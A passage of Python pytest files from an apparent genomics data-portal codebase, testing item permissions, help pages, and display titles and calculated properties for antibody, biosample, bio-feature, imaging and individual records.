res2 = wrangler_testapp.patch_json(res1['@id'], {'status': 'pre-release'}).json['@graph'][0]
assert res2['status'] == 'pre-release'
# others can not view
viewing_group_member_testapp.get(res1['@id'], status=403)
@pytest.fixture
def static_section_item():
return {
'name': 'static-section.test_ss',
'title': 'Test Static Section',
'body': 'This is a test section'
}
def test_static_section_with_lab_view_by_lab_member(
wrangler_testapp, lab_viewer_testapp, lab, static_section_item):
static_section_item['lab'] = lab['@id']
static_section_item['status'] = 'released to lab'
res = wrangler_testapp.post_json('/static_section', static_section_item).json['@graph'][0]
lab_viewer_testapp.get(res['@id'], status=200)
def test_permissions_validate_false(award, lab, file_formats, submitter_testapp, wrangler_testapp):
"""
Only admin can use validate=false with POST/PUT/PATCH
"""
file_item_body = {
'award': award['uuid'],
'lab': lab['uuid'],
'file_format': file_formats.get('fastq').get('uuid'),
'paired_end': '1'
}
# does it matter that the wrangler posts this? I don't think so for this test - Will 03/23/2021
res = submitter_testapp.post_json('/file_fastq', file_item_body, status=201)
# no permissions
submitter_testapp.post_json('/file_fastq/?validate=false', file_item_body, status=403)
submitter_testapp.patch_json(res.json['@graph'][0]['@id'] + '?validate=false',
{'paired_end': '1'}, status=403)
submitter_testapp.put_json(res.json['@graph'][0]['@id'] + '?validate=false',
file_item_body, status=403)
# okay permissions
try:
wrangler_testapp.post_json('/file_fastq/?validate=false&upgrade=False', file_item_body, status=201)
except TypeError: # thrown from open_data_url, but should make it there
pass # we are ok, any other exception should be thrown
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'] + '?validate=false',
{'paired_end': '1'}, status=200)
try:
wrangler_testapp.put_json(res.json['@graph'][0]['@id'] + '?validate=false',
file_item_body, status=200)
except TypeError: # thrown from open_data_url, but should make it there
pass # we are ok, any other exception should be thrown
```
#### File: encoded/tests/test_root.py
```python
from unittest import mock
from ..root import uptime_info
from dcicutils import lang_utils
from dcicutils.misc_utils import ignored
def test_uptime_info():
with mock.patch("uptime.uptime", return_value=65 * 60):
assert uptime_info() == "1 hour, 5 minutes"
def fail(*args, **kwargs):
ignored(args, kwargs)
raise RuntimeError("Failure")
with mock.patch("uptime.uptime", side_effect=fail):
assert uptime_info() == "unavailable"
with mock.patch.object(lang_utils, "relative_time_string", fail):
assert uptime_info() == "unavailable"
```
#### File: encoded/tests/test_static_page.py
```python
import pytest
import webtest
from dcicutils.qa_utils import notice_pytest_fixtures
from .workbook_fixtures import app_settings, app # are these needed? -kmp 12-Mar-2021
notice_pytest_fixtures(app_settings, app)
pytestmark = [pytest.mark.indexing, pytest.mark.working]
@pytest.fixture(scope='module')
def help_page_section_json():
return {
"title": "",
"name" : "help.user-guide.rest-api.rest_api_submission",
"file": "/docs/source/rest_api_submission.rst",
"uuid" : "442c8aa0-dc6c-43d7-814a-854af460b020"
}
@pytest.fixture(scope='module')
def help_page_json():
return {
"name": "help/user-guide/rest-api",
"title": "The REST-API",
"content": ["442c8aa0-dc6c-43d7-814a-854af460b020"],
"uuid": "a2aa8bb9-9dd9-4c80-bdb6-2349b7a3540d",
"table-of-contents": {
"enabled": True,
"header-depth": 4,
"list-styles": ["decimal", "lower-alpha", "lower-roman"]
}
}
@pytest.fixture(scope='module')
def help_page_json_draft():
return {
"name": "help/user-guide/rest-api-draft",
"title": "The REST-API",
"content": ["442c8aa0-dc6c-43d7-814a-854af460b020"],
"uuid": "a2aa8bb9-9dd9-4c80-bdb6-2349b7a3540c",
"table-of-contents": {
"enabled": True,
"header-depth": 4,
"list-styles": ["decimal", "lower-alpha", "lower-roman"]
},
"status" : "draft"
}
@pytest.fixture(scope='module')
def help_page_json_deleted():
return {
"name": "help/user-guide/rest-api-deleted",
"title": "The REST-API",
"content": ["442c8aa0-dc6c-43d7-814a-854af460b020"],
"uuid": "a2aa8bb9-9dd9-4c80-bdb6-2349b7a3540a",
"table-of-contents": {
"enabled": True,
"header-depth": 4,
"list-styles": ["decimal", "lower-alpha", "lower-roman"]
},
"status" : "deleted"
}
@pytest.fixture(scope='module')
def posted_help_page_section(testapp, help_page_section_json):
try:
res = testapp.post_json('/static-sections/', help_page_section_json, status=201)
val = res.json['@graph'][0]
except webtest.AppError:
res = testapp.get('/' + help_page_section_json['uuid'], status=301).follow()
val = res.json
return val
@pytest.fixture(scope='module')
def help_page(testapp, posted_help_page_section, help_page_json):
try:
res = testapp.post_json('/pages/', help_page_json, status=201)
val = res.json['@graph'][0]
except webtest.AppError:
res = testapp.get('/' + help_page_json['uuid'], status=301).follow()
val = res.json
return val
@pytest.fixture(scope='module')
def help_page_deleted(testapp, posted_help_page_section, help_page_json_draft):
try:
res = testapp.post_json('/pages/', help_page_json_draft, status=201)
val = res.json['@graph'][0]
except webtest.AppError:
res = testapp.get('/' + help_page_json_draft['uuid'], status=301).follow()
val = res.json
return val
@pytest.fixture(scope='module')
def help_page_restricted(testapp, posted_help_page_section, help_page_json_deleted):
try:
res = testapp.post_json('/pages/', help_page_json_deleted, status=201)
val = res.json['@graph'][0]
except webtest.AppError:
res = testapp.get('/' + help_page_json_deleted['uuid'], status=301).follow()
val = res.json
return val
def test_get_help_page(testapp, help_page):
help_page_url = "/" + help_page['name']
res = testapp.get(help_page_url, status=200)
assert res.json['@id'] == help_page_url
assert res.json['@context'] == help_page_url
assert 'HelpPage' in res.json['@type']
assert 'StaticPage' in res.json['@type']
#assert res.json['content'] == help_page['content'] # No longer works latter is set to an @id of static_section
assert 'Accession and uuid are automatically assigned during initial posting' in res.json['content'][0]['content'] # Instead lets check what we have embedded on GET request is inside our doc file (rest_api_submission.md).
assert res.json['toc'] == help_page['table-of-contents']
def test_get_help_page_deleted(anonhtmltestapp, help_page_deleted):
help_page_url = "/" + help_page_deleted['name']
anonhtmltestapp.get(help_page_url, status=403)
def test_get_help_page_no_access(anonhtmltestapp, testapp, help_page_restricted):
help_page_url = "/" + help_page_restricted['name']
anonhtmltestapp.get(help_page_url, status=403)
testapp.get(help_page_url, status=200)
def test_page_unique_name(testapp, help_page, help_page_deleted):
# POST again with same name and expect validation error
new_page = {'name': help_page['name']}
res = testapp.post_json('/page', new_page, status=422)
expected_val_err = "%s already exists with name '%s'" % (help_page['uuid'], new_page['name'])
actual_error_description = res.json['errors'][0]['description']
print("expected:", expected_val_err)
print("actual:", actual_error_description)
assert expected_val_err in actual_error_description
# also test PATCH of an existing page with another name
res = testapp.patch_json(help_page_deleted['@id'], {'name': new_page['name']}, status=422)
assert expected_val_err in res.json['errors'][0]['description']
```
#### File: encoded/tests/test_types_antibody.py
```python
import pytest
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def antibody_data(lab, award):
return {
'lab': lab['@id'],
'award': award['@id'],
'description': 'Test Antibody',
'antibody_name': 'test-Ab',
'antibody_product_no': '123'
}
@pytest.fixture
def post_antibody_vendor(testapp, lab, award):
item = {'lab': lab['@id'],
'award': award['@id'],
'title': 'Vendor Biolabs'}
return testapp.post_json('/vendor', item).json['@graph'][0]
@pytest.fixture
def ab_w_name(testapp, antibody_data):
return testapp.post_json('/antibody', antibody_data).json['@graph'][0]
def test_antibody_update_antibody_id(ab_w_name):
assert ab_w_name['antibody_id'] == 'test-Ab-123'
def test_antibody_display_title(testapp, ab_w_name, post_antibody_vendor):
assert ab_w_name['display_title'] == 'test-Ab (123)'
res = testapp.patch_json(
ab_w_name['@id'],
{'antibody_vendor': post_antibody_vendor['@id']}
).json['@graph'][0]
assert res['display_title'] == 'test-Ab (Vendor Biolabs, 123)'
```
#### File: encoded/tests/test_types_bio_feature.py
```python
import pytest
pytestmark = [pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def so_ont(testapp):
return testapp.post_json('/ontology', {'ontology_name': 'SO'}).json['@graph'][0]
@pytest.fixture
def protein_term(testapp, so_ont):
gterm = {
'uuid': '8bea5bde-d860-49f8-b178-35d0dadbd644',
'term_id': 'SO:0000104', 'term_name': 'polypeptide',
'preferred_name': 'protein',
'source_ontologies': [so_ont['@id']]}
return testapp.post_json('/ontology_term', gterm).json['@graph'][0]
@pytest.fixture
def region_term(testapp, so_ont):
gterm = {
'uuid': '6bea5bde-d860-49f8-b178-35d0dadbd644',
'term_id': 'SO:0000001', 'term_name': 'region',
'source_ontologies': [so_ont['@id']]}
return testapp.post_json('/ontology_term', gterm).json['@graph'][0]
@pytest.fixture
def transcript_term(testapp, so_ont):
gterm = {
'uuid': '5bea5bde-d860-49f8-b178-35d0dadbd644',
'term_id': 'SO:0000673', 'term_name': 'transcript',
'source_ontologies': [so_ont['@id']]}
return testapp.post_json('/ontology_term', gterm).json['@graph'][0]
@pytest.fixture
def component_term(testapp, so_ont):
gterm = {
'uuid': '4bea5bde-d860-49f8-b178-35d0dadbd644',
'term_id': 'GO:0005575', 'term_name': 'cellular_component',
'source_ontologies': [so_ont['@id']]}
return testapp.post_json('/ontology_term', gterm).json['@graph'][0]
@pytest.fixture
def gene_item(testapp, lab, award, human):
gene_item = {'lab': lab['@id'], 'award': award['@id'], 'geneid': '5885'}
return testapp.post_json('/gene', gene_item).json['@graph'][0]
@pytest.fixture
def mouse_gene_item(testapp, lab, award, mouse):
gene_item = {'lab': lab['@id'], 'award': award['@id'], 'geneid': '16825'}
return testapp.post_json('/gene', gene_item).json['@graph'][0]
@pytest.fixture
def armadillo_gene_item(testapp, lab, award):
gene_item = {'lab': lab['@id'], 'award': award['@id'], 'geneid': '101428042'}
return testapp.post_json('/gene', gene_item).json['@graph'][0]
@pytest.fixture
def gene_bio_feature(testapp, lab, award, gene_term, gene_item, human):
item = {'award': award['@id'],
'lab': lab['@id'],
'description': 'Test Gene BioFeature',
'feature_type': gene_term['@id'],
'organism_name': 'human',
'relevant_genes': [gene_item['@id']]}
return testapp.post_json('/bio_feature', item).json['@graph'][0]
@pytest.fixture
def mouse_gene_bio_feature(testapp, lab, award, gene_term, mouse_gene_item, human, mouse):
item = {'award': award['@id'],
'lab': lab['@id'],
'description': 'Test Mouse Gene BioFeature',
'feature_type': gene_term['@id'],
'organism_name': 'mouse',
'relevant_genes': [mouse_gene_item['@id']]}
return testapp.post_json('/bio_feature', item).json['@graph'][0]
@pytest.fixture
def armadillo_gene_bio_feature(testapp, lab, award, gene_term, armadillo_gene_item):
item = {'award': award['@id'],
'lab': lab['@id'],
'description': 'Test Mouse Gene BioFeature',
'feature_type': gene_term['@id'],
'relevant_genes': [armadillo_gene_item['@id']]}
return testapp.post_json('/bio_feature', item).json['@graph'][0]
@pytest.fixture
def multi_species_gene_bio_feature(testapp, lab, award, gene_term, gene_item, mouse_gene_item, human, mouse):
item = {'award': award['@id'],
'lab': lab['@id'],
'description': 'Test Multi Gene BioFeature',
'feature_type': gene_term['@id'],
'organism_name': 'multiple organisms',
'relevant_genes': [mouse_gene_item['@id'], gene_item['@id']]}
return testapp.post_json('/bio_feature', item).json['@graph'][0]
@pytest.fixture
def genomic_region_bio_feature(testapp, lab, award, region_term, some_genomic_region, human):
item = {'award': award['@id'],
'lab': lab['@id'],
'description': 'Test Region BioFeature',
'feature_type': region_term['@id'],
'organism_name': 'human',
'genome_location': [some_genomic_region['@id']]}
return testapp.post_json('/bio_feature', item).json['@graph'][0]
def test_bio_feature_display_title_gene(gene_bio_feature, gene_item):
assert gene_bio_feature.get('display_title') == gene_item.get('display_title') + ' gene'
def test_bio_feature_display_title_genomic_region(genomic_region_bio_feature):
assert genomic_region_bio_feature.get('display_title') == 'GRCh38:1:17-544 region'
def test_bio_feature_display_title_genomic_region_w_preferred_label(testapp, genomic_region_bio_feature):
label = 'awesome region'
res = testapp.patch_json(genomic_region_bio_feature['@id'], {'preferred_label': label}, status=200)
assert res.json['@graph'][0].get('display_title') == label
def test_bio_feature_display_title_protein_transcript(
testapp, gene_item, gene_bio_feature, protein_term, transcript_term):
''' gene_bio_feature is in datafixtures '''
types = [protein_term, transcript_term]
for t in types:
res = testapp.patch_json(gene_bio_feature['@id'], {'feature_type': t['@id']}, status=200)
assert res.json['@graph'][0].get('display_title') == gene_item.get('display_title') + ' ' + t.get('display_title')
def test_bio_feature_display_title_modfied_protein(
testapp, gene_item, gene_bio_feature, protein_term):
''' gene_bio_feature is in datafixtures '''
res = testapp.patch_json(
gene_bio_feature['@id'],
{
'feature_type': protein_term['@id'],
'feature_mods': [{
'mod_type': 'Methylation',
'mod_position': 'K9'
}]
},
status=200)
assert res.json['@graph'][0].get('display_title') == 'RAD21 protein with K9 Methylation'
def test_bio_feature_display_title_cellular_component(testapp, component_term, lab, award):
struct = 'Nuclear pore complex'
item = {
'feature_type': component_term['@id'],
'cellular_structure': struct,
'lab': lab['@id'],
'award': award['@id'],
'description': 'test structure'
}
res = testapp.post_json('/bio_feature', item, status=201)
assert res.json['@graph'][0].get('display_title') == struct
def test_bio_feature_display_title_mouse_gene(
mouse_gene_bio_feature, mouse_gene_item):
assert mouse_gene_bio_feature.get('display_title') == mouse_gene_item.get('display_title') + ' mouse gene'
def test_bio_feature_display_title_multi_species_gene(
multi_species_gene_bio_feature):
assert multi_species_gene_bio_feature.get('display_title') == 'Ldb1, RAD21 genes multiple organisms'
def test_bio_feature_display_title_unknown_organism_gene(
armadillo_gene_bio_feature, armadillo_gene_item):
assert armadillo_gene_bio_feature.get('display_title') == armadillo_gene_item.get('display_title') + ' gene'
def test_bio_feature_display_title_preferred_name_w_org(
testapp, mouse_gene_bio_feature):
mfeat = testapp.patch_json(mouse_gene_bio_feature['@id'], {'preferred_label': 'Cool gene'}, status=200).json['@graph'][0]
assert mfeat.get('display_title') == 'Cool gene (mouse)'
```
#### File: encoded/tests/test_types_biosample.py
```python
import pytest
# from snovault.schema_utils import load_schema
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def biosample_cc_w_diff(testapp, de_term, lab, award):
item = {
"culture_start_date": "2018-01-01",
"differentiation_state": "Differentiated to definitive endoderm demonstrated by decreased Oct4 expression and increased Sox17 expression",
"tissue": de_term['@id'],
"in_vitro_differentiated": "Yes",
'award': award['@id'],
'lab': lab['@id']
}
return testapp.post_json('/biosample_cell_culture', item).json['@graph'][0]
@pytest.fixture
def biosample_1(testapp, human_biosource, lab, award):
item = {
'description': "GM12878 prepared for Hi-C",
'biosource': [human_biosource['@id'], ],
'award': award['@id'],
'lab': lab['@id'],
}
return testapp.post_json('/biosample', item).json['@graph'][0]
@pytest.fixture
def biosample_w_mod(testapp, biosample_1, mod_w_target):
return testapp.patch_json(biosample_1['@id'], {'modifications': [mod_w_target['@id']]}).json['@graph'][0]
@pytest.fixture
def biosample_w_treatment(testapp, biosample_1, rnai):
return testapp.patch_json(biosample_1['@id'], {'treatments': [rnai['@id']]}).json['@graph'][0]
def biosample_relation(derived_from):
return {"biosample_relation": [{"relationship_type": "derived from",
"biosample": derived_from['@id']}]}
def test_biosample_has_display_title(testapp, biosample_1):
# accession fallback used for display title here
assert biosample_1['display_title'] == biosample_1['accession']
# data from test/datafixtures
def test_update_biosample_relation(testapp, human_biosample, biosample_1):
patch_res = testapp.patch_json(human_biosample['@id'], biosample_relation(biosample_1))
res = testapp.get(biosample_1['@id'])
# expected relation: 'biosample': human_biosample['@id'],
# 'relationship_type': 'parent of'
assert res.json['biosample_relation'][0]['biosample']['@id'] == human_biosample['@id']
assert res.json['biosample_relation'][0]['relationship_type'] == 'parent of'
def test_biosample_calculated_properties(testapp, biosample_1, ):
"""
Test to ensure the calculated properties are in result returned from testapp
These have string 'None' returned if no value as they are used in Item page view
"""
res = testapp.get(biosample_1['@id']).json
assert 'modifications_summary' in res
assert 'modifications_summary_short' in res
assert 'treatments_summary' in res
assert 'biosource_summary' in res
def test_biosample_biosource_summary_one_biosource(testapp, biosample_1, human_biosource):
assert biosample_1['biosource_summary'] == human_biosource['biosource_name']
def test_biosample_biosource_summary_two_biosource(testapp, biosample_1, human_biosource, lung_biosource):
res = testapp.patch_json(biosample_1['@id'], {'biosource': [human_biosource['@id'], lung_biosource['@id']]}).json['@graph'][0]
assert human_biosource['biosource_name'] in res['biosource_summary']
assert lung_biosource['biosource_name'] in res['biosource_summary']
assert ' and ' in res['biosource_summary']
def test_biosample_biosource_summary_w_differentiation(testapp, biosample_1, human_biosource, biosample_cc_w_diff, de_term):
res = testapp.patch_json(biosample_1['@id'], {'cell_culture_details': [biosample_cc_w_diff['@id']]}).json['@graph'][0]
assert human_biosource['biosource_name'] in res['biosource_summary']
assert ' differentiated to ' in res['biosource_summary']
assert de_term['display_title'] in res['biosource_summary']
def test_biosample_sample_type_w_differentiation(testapp, biosample_1, biosample_cc_w_diff):
res = testapp.patch_json(biosample_1['@id'], {'cell_culture_details': [biosample_cc_w_diff['@id']]}).json['@graph'][0]
assert res['biosample_type'] == 'in vitro differentiated cells'
def test_biosample_sample_type_immortalized_wo_differentiation(testapp, biosample_1, biosample_cc_wo_diff):
res = testapp.patch_json(biosample_1['@id'], {'cell_culture_details': [biosample_cc_wo_diff['@id']]}).json['@graph'][0]
assert res['biosample_type'] == 'immortalized cells'
def test_biosample_sample_type_bs_stem_cell_line(testapp, biosample_1, human_biosource):
bsres = testapp.patch_json(human_biosource['@id'], {'biosource_type': 'stem cell derived cell line'}).json['@graph'][0]
res = testapp.patch_json(biosample_1['@id'], {'biosource': [bsres['@id']]}).json['@graph'][0]
assert res['biosample_type'] == 'stem cells'
def test_biosample_sample_type_bs_multicellular(testapp, biosample_1, human_biosource):
bsres = testapp.patch_json(human_biosource['@id'], {'biosource_type': 'multicellular organism'}).json['@graph'][0]
res = testapp.patch_json(biosample_1['@id'], {'biosource': [bsres['@id']]}).json['@graph'][0]
assert res['biosample_type'] == 'whole organisms'
def test_biosample_sample_type_bs_tissue(testapp, biosample_1, human_biosource):
bty = 'tissue'
bsres = testapp.patch_json(human_biosource['@id'], {'biosource_type': bty}).json['@graph'][0]
res = testapp.patch_json(biosample_1['@id'], {'biosource': [bsres['@id']]}).json['@graph'][0]
assert res['biosample_type'] == bty
def test_biosample_sample_type_bs_lines_and_to_pluralize(testapp, biosample_1, human_biosource):
types = {
"primary cell": "primary cells",
"primary cell line": "primary cells",
"immortalized cell line": "immortalized cells",
"stem cell": "stem cells",
"induced pluripotent stem cell": "induced pluripotent stem cells"
}
for bty, bsty in types.items():
bsres = testapp.patch_json(human_biosource['@id'], {'biosource_type': bty}).json['@graph'][0]
res = testapp.patch_json(biosample_1['@id'], {'biosource': [bsres['@id']]}).json['@graph'][0]
assert res['biosample_type'] == bsty
def test_biosample_sample_type_bs_multiple_same_type(testapp, biosample_1, human_biosource, GM12878_biosource):
res = testapp.patch_json(biosample_1['@id'], {'biosource': [human_biosource['@id'], GM12878_biosource['@id']]}).json['@graph'][0]
assert res['biosample_type'] == 'immortalized cells'
def test_biosample_sample_type_bs_multiple_diff_types(testapp, biosample_1, human_biosource, lung_biosource):
res = testapp.patch_json(biosample_1['@id'], {'biosource': [human_biosource['@id'], lung_biosource['@id']]}).json['@graph'][0]
assert res['biosample_type'] == 'mixed sample'
def test_biosample_modifications_summaries(biosample_w_mod):
assert biosample_w_mod['modifications_summary'] == 'Crispr for RAD21 gene'
assert biosample_w_mod['modifications_summary_short'] == 'RAD21 Crispr'
def test_biosample_modifications_summaries_no_mods(biosample_1):
assert biosample_1.get('modifications_summary') == 'None'
assert biosample_1.get('modifications_summary_short') == 'None'
def test_biosample_treatments_summary(biosample_w_treatment):
assert biosample_w_treatment.get('treatments_summary') == 'shRNA treatment'
def test_biosample_treatments_summary_no_treatment(biosample_1):
assert biosample_1.get('treatments_summary') == 'None'
def test_biosample_category_undifferentiated_stem_cells(testapp, biosample_1, human_biosource):
scl = testapp.patch_json(human_biosource['@id'], {'biosource_type': 'stem cell derived cell line'}).json['@graph'][0]
bios = testapp.patch_json(biosample_1['@id'], {'biosource': [scl['@id']]}).json['@graph'][0]
assert 'Human stem cell' in bios.get('biosample_category')
def test_biosample_category_differentiated_stem_cells(testapp, biosample_1, human_biosource, biosample_cc_w_diff):
scl = testapp.patch_json(human_biosource['@id'], {'biosource_type': 'stem cell derived cell line'}).json['@graph'][0]
bios = testapp.patch_json(biosample_1['@id'], {'biosource': [scl['@id']], 'cell_culture_details': [biosample_cc_w_diff['@id']]}).json['@graph'][0]
cats = bios.get('biosample_category')
assert 'Human stem cell' not in cats
assert 'In vitro Differentiation' in cats
def test_biosample_biosource_category_two_biosource(testapp, biosample_1, human_biosource, lung_biosource):
res = testapp.patch_json(biosample_1['@id'], {'biosource': [human_biosource['@id'], lung_biosource['@id']]}).json['@graph'][0]
cat = res.get('biosample_category')
assert len(cat) == 1
assert cat[0] == 'Mixed samples'
# setting up fixtures for testing tissue and organ calcprop
@pytest.fixture
def brain_term(testapp, uberon_ont, cns_term, ectoderm_term):
item = {
"is_slim_for": "organ",
"term_id": "brain_tid",
"term_name": "brain",
"source_ontologies": [uberon_ont['@id']],
"slim_terms": [cns_term['@id'], ectoderm_term['@id']]
}
return testapp.post_json('/ontology_term', item).json['@graph'][0]
@pytest.fixture
def cns_term(testapp, uberon_ont, ectoderm_term):
item = {
"is_slim_for": "system",
"term_id": "cns_tid",
"term_name": "central nervous system",
"source_ontologies": [uberon_ont['@id']],
"slim_terms": [ectoderm_term['@id']]
}
return testapp.post_json('/ontology_term', item).json['@graph'][0]
@pytest.fixture
def ectoderm_term(testapp, uberon_ont):
item = {
"is_slim_for": "developmental",
"term_id": "ectoderm_tid",
"term_name": "ectoderm",
"source_ontologies": [uberon_ont['@id']],
}
return testapp.post_json('/ontology_term', item).json['@graph'][0]
@pytest.fixture
def primary_cell_term(testapp, ontology):
item = {
"is_slim_for": "cell",
"term_id": "pcell_id",
"term_name": "primary cell",
"source_ontologies": [ontology['@id']],
}
return testapp.post_json('/ontology_term', item).json['@graph'][0]
@pytest.fixture
def cortical_neuron_term(testapp, uberon_ont, brain_term, cns_term,
ectoderm_term, primary_cell_term):
item = {
"term_id": "cort_neuron_id",
"term_name": "cortical neuron",
"source_ontologies": [uberon_ont['@id']],
"slim_terms": [brain_term['@id'], cns_term['@id'], ectoderm_term['@id'], primary_cell_term['@id']]
}
return testapp.post_json('/ontology_term', item).json['@graph'][0]
@pytest.fixture
def bcc_diff_to_cortical(testapp, lab, award, cortical_neuron_term):
item = {
"culture_start_date": "2018-01-01",
"differentiation_state": "Stem cell differentiated to cortical neuron",
"tissue": cortical_neuron_term['@id'],
"in_vitro_differentiated": "Yes",
'award': award['@id'],
'lab': lab['@id']
}
return testapp.post_json('/biosample_cell_culture', item).json['@graph'][0]
@pytest.fixture
def diff_cortical_neuron_bs(testapp, F123_biosource, bcc_diff_to_cortical, lab, award):
item = {
"description": "Differentiated cortical neuron",
"biosource": [F123_biosource['@id']],
"cell_culture_details": [bcc_diff_to_cortical['@id']],
"award": award['@id'],
"lab": lab['@id']
}
return testapp.post_json('/biosample', item).json['@graph'][0]
@pytest.fixture
def brain_biosource(testapp, brain_term, lab, award):
item = {
"description": "Brain tissue",
"biosource_type": "tissue",
"tissue": brain_term['@id'],
"lab": lab['@id'],
"award": award['@id']
}
return testapp.post_json('/biosource', item).json['@graph'][0]
@pytest.fixture
def brain_biosample(testapp, brain_biosource, lab, award):
item = {
"description": "Brain Tissue Biosample",
"biosource": [brain_biosource['@id']],
"award": award['@id'],
"lab": lab['@id']
}
return testapp.post_json('/biosample', item).json['@graph'][0]
@pytest.fixture
def mixed_biosample(testapp, brain_biosource, lung_biosource, lab, award):
item = {
"description": "Mixed Tissue Biosample",
"biosource": [brain_biosource['@id'], lung_biosource['@id']],
"award": award['@id'],
"lab": lab['@id']
}
return testapp.post_json('/biosample', item).json['@graph'][0]
def test_get_tissue_organ_info_none_present(biosample_1):
assert 'tissue_organ_info' not in biosample_1
def test_get_tissue_organ_info_tissue_in_cell_culture(diff_cortical_neuron_bs, cortical_neuron_term):
org_sys = sorted(['brain', 'central nervous system', 'ectoderm'])
assert 'tissue_organ_info' in diff_cortical_neuron_bs
assert diff_cortical_neuron_bs['tissue_organ_info']['tissue_source'] == cortical_neuron_term.get('display_title')
assert sorted(diff_cortical_neuron_bs['tissue_organ_info']['organ_system']) == org_sys
def test_get_tissue_organ_info_tissue_in_biosource(brain_biosample, brain_term):
org_sys = sorted(['central nervous system', 'ectoderm'])
assert 'tissue_organ_info' in brain_biosample
assert brain_biosample['tissue_organ_info']['tissue_source'] == brain_term.get('display_title')
assert sorted(brain_biosample['tissue_organ_info']['organ_system']) == org_sys
def test_get_tissue_organ_info_tissue_mixed_biosample(mixed_biosample):
org_sys = sorted(['central nervous system', 'ectoderm'])
assert 'tissue_organ_info' in mixed_biosample
assert mixed_biosample['tissue_organ_info']['tissue_source'] == 'mixed tissue'
assert sorted(mixed_biosample['tissue_organ_info']['organ_system']) == org_sys
def test_get_tissue_organ_info_none_if_only_cell_slim_terms(testapp, F123_biosource, lab, award):
item = {
"description": "F123 Biosample",
"biosource": [F123_biosource['@id']],
"award": award['@id'],
"lab": lab['@id']
}
f123_biosample = testapp.post_json('/biosample', item).json['@graph'][0]
assert 'tissue_organ_info' not in f123_biosample
```
#### File: encoded/tests/test_types_imaging.py
```python
import pytest
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def img_path_blank(testapp, lab, award):
item = {'award': award['@id'], 'lab': lab['@id']}
return testapp.post_json('/imaging_path', item).json['@graph'][0]
@pytest.fixture
def p_antibody(testapp, lab, award):
item = {'award': award['@id'],
'lab': lab['@id'],
'antibody_name': 'RAD21 antibody',
'antibody_product_no': 'ab12043'}
return testapp.post_json('/antibody', item).json['@graph'][0]
@pytest.fixture
def s_antibody(testapp, lab, award):
item = {'award': award['@id'],
'lab': lab['@id'],
'antibody_name': 'anti-mouse antibody',
'antibody_product_no': '9876'}
return testapp.post_json('/antibody', item).json['@graph'][0]
def test_imgpath_displaytitle_target_probe(testapp, img_path_blank, prot_bio_feature):
res = testapp.patch_json(img_path_blank['@id'], {'target': [prot_bio_feature['@id']]}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein'
res = testapp.patch_json(img_path_blank['@id'], {'labeled_probe': 'imaging probe'}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein targeted by imaging probe'
def test_imgpath_displaytitle(testapp, img_path_blank, prot_bio_feature):
assert img_path_blank['display_title'] == 'not enough information'
res = testapp.patch_json(img_path_blank['@id'], {'target': [prot_bio_feature['@id']],
'labels': ['GFP', 'RFP']}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein targeted by GFP,RFP'
res = testapp.patch_json(img_path_blank['@id'], {'labeled_probe': 'imaging probe'}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein targeted by GFP,RFP-labeled imaging probe'
res = testapp.patch_json(img_path_blank['@id'], {'other_probes': ['intermediate probe 1', 'other probe 2']}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein targeted by intermediate probe 1, other probe 2 (with GFP,RFP-labeled imaging probe)'
res = testapp.patch_json(img_path_blank['@id'], {'override_display_title': 'Custom title'}).json['@graph'][0]
assert res['display_title'] == 'Custom title'
def test_imgpath_displaytitle_antibodies(testapp, img_path_blank, prot_bio_feature, p_antibody, s_antibody):
res = testapp.patch_json(img_path_blank['@id'], {'target': [prot_bio_feature['@id']],
'primary_antibodies': [p_antibody['@id']],
'secondary_antibody': s_antibody['@id'],
'labels': ['AF 647']}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein targeted by RAD21 antibody (with AF 647-labeled anti-mouse antibody)'
res = testapp.patch_json(img_path_blank['@id'], {'other_probes': ['other probe'],
'labeled_probe': 'imaging probe'}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein targeted by other probe, RAD21 antibody (with AF 647-labeled imaging probe, anti-mouse antibody)'
def test_imgpath_displaytitle_duplicate_label_on_secondary_ab(testapp, img_path_blank, prot_bio_feature, s_antibody):
labeled_sec_ab = testapp.patch_json(s_antibody['@id'], {'antibody_name': 'anti-mouse AF 647'}).json['@graph'][0]
res = testapp.patch_json(img_path_blank['@id'], {'target': [prot_bio_feature['@id']],
'secondary_antibody': labeled_sec_ab['@id'],
'labels': ['AF 647']}).json['@graph'][0]
assert res['display_title'] == 'RAD21 protein targeted by anti-mouse AF 647'
def test_imgpath_displaytitle_labels_only(testapp, img_path_blank):
res = testapp.patch_json(img_path_blank['@id'], {'labels': ['GFP', 'RFP']}).json['@graph'][0]
assert res['display_title'] == 'GFP,RFP'
def test_imgpath_displaytitle_labeled_probe_only(testapp, img_path_blank):
res = testapp.patch_json(img_path_blank['@id'], {'labels': ['GFP'],
'labeled_probe': 'imaging probe'}).json['@graph'][0]
assert res['display_title'] == 'GFP-labeled imaging probe'
```
#### File: encoded/tests/test_types_individual.py
```python
import pytest
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def mouse_child(testapp, mouse, lab, award):
return {
'uuid': '4731449b-f283-4fdf-ad8a-b69cf5a7e68a',
'award': award['@id'],
'lab': lab['@id'],
'organism': mouse['@id'],
"sex": "female",
}
@pytest.fixture
def mouse_individual_2(testapp, mouse, lab, award):
item = {
'uuid': 'd89c5c5b-a427-4efa-b6da-44239d92f2e7',
"age": 99,
"age_units": "day",
'award': award['@id'],
'lab': lab['@id'],
'organism': mouse['@id'],
"mouse_strain": "Balb-c",
"mouse_life_stage": "adult",
"sex": "male",
}
return testapp.post_json('/individual_mouse', item).json['@graph'][0]
def test_validate_individual_relation_valid_post(testapp, award, lab, mouse_individual, mouse_child):
mouse_child['individual_relation'] = [
{'relationship_type': 'derived from', 'individual': mouse_individual['@id']}]
res = testapp.post_json('/individual_mouse', mouse_child, status=201)
assert not res.json.get('errors')
def test_validate_individual_relation_species(testapp, award, lab, mouse_child, human_individual):
